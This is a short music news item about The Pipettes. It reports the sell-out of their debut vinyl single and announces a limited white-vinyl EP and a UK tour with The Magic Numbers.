The Pipettes single and tour

Brighton belles The Pipettes are to release a limited edition three-track EP following the lightning fast sell-out of their debut.

All 500 copies of their "I Like A Boy In Uniform (School Uniform)" vinyl-only single on Unpopular Records were snapped up within days of release.

The follow up on Transgressive Records (home to debut releases by The Subways, Young Knives and Mystery Jets amongst others), features three songs produced by Paul Tipler (Eighties Matchbox B-Line Disaster, Idlewild, Clinic, Stereolab).

"ABC", "Judy" and "Simon Says" will be available in a strictly limited 500-only white vinyl 7" format from June 13.

Meanwhile, The Pipettes will tour the UK later this month with The Magic Numbers. The gigs follow last week's riotous three-day jaunt to Ireland with The Go! Team as well as live slots with British Sea Power, Quasi, Graham Coxon, Hot Snakes and Electric Soft Parade.

The Pipettes (Becki, Rose and new girl Gwenno) and their backing band The Cassettes formed at a seaside party last year and have wasted no time in their stated mission to "turn back the clock to a time before The Beatles ruined everything".

Their trademark polka dot dresses, doowop anthems and choreographed hand movements have earned them fans across the globe - not least in Finland, where The Pipettes already have an unofficial "Pipette Rescue" fan club in spite of the fact they have never visited the country!

John Peel was a huge fan of the band and played their demo cd frequently. The Pipettes have since played a live Radio One session for Huw Stephens and their song "It Hurts To See You Dance So Well" is one of the top downloads on iTunes.
